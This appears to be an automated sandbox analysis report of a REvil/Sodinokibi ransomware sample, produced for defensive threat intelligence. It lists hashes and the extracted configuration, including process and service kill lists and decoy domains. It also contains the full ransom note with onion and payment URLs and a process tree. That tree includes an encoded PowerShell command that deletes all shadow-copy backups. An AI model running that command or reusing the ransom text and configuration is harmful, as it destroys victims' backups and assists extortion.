Analysis

  • max time kernel
    128s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    25-07-2024 09:49

General

  • Target

    2024-07-25_72d9db37db04e51f61fc7b3424a009d2_revil_wapomi.exe

  • Size

    139KB

  • MD5

    72d9db37db04e51f61fc7b3424a009d2

  • SHA1

    3be50ec5fced0b0f0e9f1795ecbafc7538f28426

  • SHA256

    ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae

  • SHA512

    be13842d7b615579714ac1dab4f43e11207075a4a3d09ec2aae2c87727ccdde2dece33c2394b20e0e669cd03f8c8f42924bf8d6cdaf1ab9489d9b555fb1a4281

  • SSDEEP

    1536:+DvcP3aXhpshwVs5OE8yNcYQpG2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOx9VG8:5lSVhaNcYMkgnBR5uiV1UvQFOxXGCH

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr

Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\08l11gua9-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 08l11gua9. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C422BF20BC7E7442 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C422BF20BC7E7442 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: qEfVzEajFrK9DhO1wN5+o9VuxQ3cswjqAwjAND90pjp/r572WjvaLImFp+5k/C/A HnG/bwCtBItbxT83oAnRE1sUSnQvlrQrzgVHooOC6XmXJbKURJ8+nXySXj9Rk70V ntkmouWiFV96sxYdkSivZHPp73CSTOU3Xf4F8v/0HRPD2rB4UActkm7h7L2PHIe5 6JrBDzZIxMDF2xc1sB4VT81+U2noyJovbNTAvUJ4dZipv3K9rZxE0KX8dkcHFGDM 7l8Ogguw0QDCSr3UYrjpcfH65oyqQcvqnL2uayxaPuRyvsDVYj/tOeZXY5vK6n21 oX+/N7zegZcurL6ANd6rbzFCom71lJZEW0uGkYqzlF4NPtoKc+hE4qD3uyMnzqYH LMVTFWoOQeGIvYQCFRQUp3UrYGPKy1XzgXrDGf88UH741riZ/6z9A9ME1XqG84t1 kuUnebM+t9DRYF2Mf6giH3J9z8nLsyTz3k4B08qDJ6r4APMUwo5wMpOMxu5xfHcb r9qZTwlMtOMccA9udav81zEkPBNDcHlguF93bLh0JvCVxT5G4xR9tZQzpCaNpnsR 68N0oV4UcHpfN2m7zgfiPDHoSMcviZTrRolwgokB7nOGy2q58fXtSghnrg9jDYlr waf1bb59R3sgQLguMaRE/wj2QO6P41N4TAMVDzmvc667APh03CPI4X4vs9Yl7WHm OzpeOruCT5fAGmS21BYbUGAEc6Ylh5NoSYV28HYdJl+5SuR0wLMgDzy9B+ADM6mx 4KT0UYBi9SY30cc230qmLn9NqnLL3Xmj/QzUCZbQHkCJBqH/f5Dqu8CRlXLncL2p YWzPsiaMs62V4CHqW2binshO/sQVjAIxDw43ZLSJGo2CzIauzooQtQm6JL2xCI8K 5YJ1+WGcI2ABbn7yMF7gq8F7MvAT9aehw3VwPCbmyvH8f1G20hpaIbAfy/YgXVzA jcVklVTHYDEvY9hopvAQ7KfReyTYcXhTTwqB0SIruFvkt9v0rs7+T5UDzP7MA+gR AZxghqVroHBWwaxX3EkR5fCoaMALNIZ5YCQJlkf/7HtmkT/Fk3KmWiuDGcaaGzRm WCn8UX7cpFg6+rqSOCQRLCGTOtzblRLcj6aXwUPLQOd7wF7v8nNgdZyqDROac3M4 Bvd1bnrqLAamJ7Mj19A1417BrnIDTl9KVwhNU6YeodyRb3EdV3jGBvmfYkHXuY3E 2vzoeeIMd9+cY3OMi7kQbrZ4klm1zvX/LzfXdEUy7Xyec/dJmtiXABmWsN3Xocwn hYM921XJOiUE9tMTnLL7N6WQOulpozZl6DWeSQ7Mfa7tUGQD3wYzOig0BDZ2PA3o I9Owiz/4kPcyhcBSKBvDOoVjzByjf3qXvB4jSdMt2xV7cXQjNtY= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C422BF20BC7E7442

http://decryptor.cc/C422BF20BC7E7442

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-07-25_72d9db37db04e51f61fc7b3424a009d2_revil_wapomi.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-07-25_72d9db37db04e51f61fc7b3424a009d2_revil_wapomi.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
      C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\76a47471.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2416
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2840
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2808

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\08l11gua9-readme.txt

      Filesize

      6KB

      MD5

      eb02de66d36e44ff38540691e7425ffb

      SHA1

      7d25cc21d5fba73209758cd958dd103e1e0cc35d

      SHA256

      8319da7b171fdaa62b93b4199ea0f7f3491651d4e3a56eaad81c5e489bbe6867

      SHA512

      7c0b4c7551ce2edc12869cbf37131b8ba406e1590d972c84656272ac1c80837e1290d6113430ae0ab0e1b5840ba7193c3827bed9d5082ff1268dbe779d9c0de5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GA43GQEJ\k2[1].rar

      Filesize

      4B

      MD5

      d3b07384d113edec49eaa6238ad5ff00

      SHA1

      f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

      SHA256

      b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

      SHA512

      0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

    • C:\Users\Admin\AppData\Local\Temp\4228398E.exe

      Filesize

      4B

      MD5

      20879c987e2f9a916e578386d499f629

      SHA1

      c7b33ddcc42361fdb847036fc07e880b81935d5d

      SHA256

      9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

      SHA512

      bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

    • C:\Users\Admin\AppData\Local\Temp\76a47471.bat

      Filesize

      187B

      MD5

      b78c240bb0b310c03f6c0b9156ad0b31

      SHA1

      651275f5bdfe085bd124ad81b6f4d8b8383f4fad

      SHA256

      c969ebb599679af7f60094c367a1f67ef64fb594dbeb781b18595d0d407405be

      SHA512

      850bd08095151fdb8a599f57e39c80bdcb490a68805cf045761f10c4fde907aab91c24c338b5f9c521cc889799b58d71959feade5d08457202b15afbc5da195b

    • C:\Users\Admin\AppData\Local\Temp\CabB8E5.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\TarB908.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      191KB

      MD5

      a946d6ab815ddbfff9192ae6412e8089

      SHA1

      8e077f035ceffb1ef14a6af8d7fc1f1485f89698

      SHA256

      7b72e89801dc3d4fc4b987085bb1103b3c0fd653c62165112b6d7e92ff15d015

      SHA512

      2e7f7c37f130a5b208494871d1df2236f4447293d238f661d9fd9a18357769850bc51ed4aaa42db44d723e9e9d94101c36676341579f82fcdb904b089679a809

    • \Users\Admin\AppData\Local\Temp\Kufmxd.exe

      Filesize

      15KB

      MD5

      f7d21de5c4e81341eccd280c11ddcc9a

      SHA1

      d4e9ef10d7685d491583c6fa93ae5d9105d815bd

      SHA256

      4485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794

      SHA512

      e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3

    • memory/1712-548-0x0000000001350000-0x0000000001359000-memory.dmp

      Filesize

      36KB

    • memory/1712-8-0x0000000001350000-0x0000000001359000-memory.dmp

      Filesize

      36KB

    • memory/1712-547-0x0000000001350000-0x0000000001359000-memory.dmp

      Filesize

      36KB

    • memory/1712-9-0x0000000001350000-0x0000000001359000-memory.dmp

      Filesize

      36KB

    • memory/1712-7-0x0000000000F80000-0x0000000000FA7000-memory.dmp

      Filesize

      156KB

    • memory/1712-544-0x0000000000F80000-0x0000000000FA7000-memory.dmp

      Filesize

      156KB

    • memory/2416-20-0x000000001B6A0000-0x000000001B982000-memory.dmp

      Filesize

      2.9MB

    • memory/2416-21-0x0000000002350000-0x0000000002358000-memory.dmp

      Filesize

      32KB

    • memory/2416-19-0x00000000028C0000-0x0000000002940000-memory.dmp

      Filesize

      512KB

    • memory/2988-11-0x0000000001350000-0x0000000001359000-memory.dmp

      Filesize

      36KB

    • memory/2988-61-0x0000000001350000-0x0000000001359000-memory.dmp

      Filesize

      36KB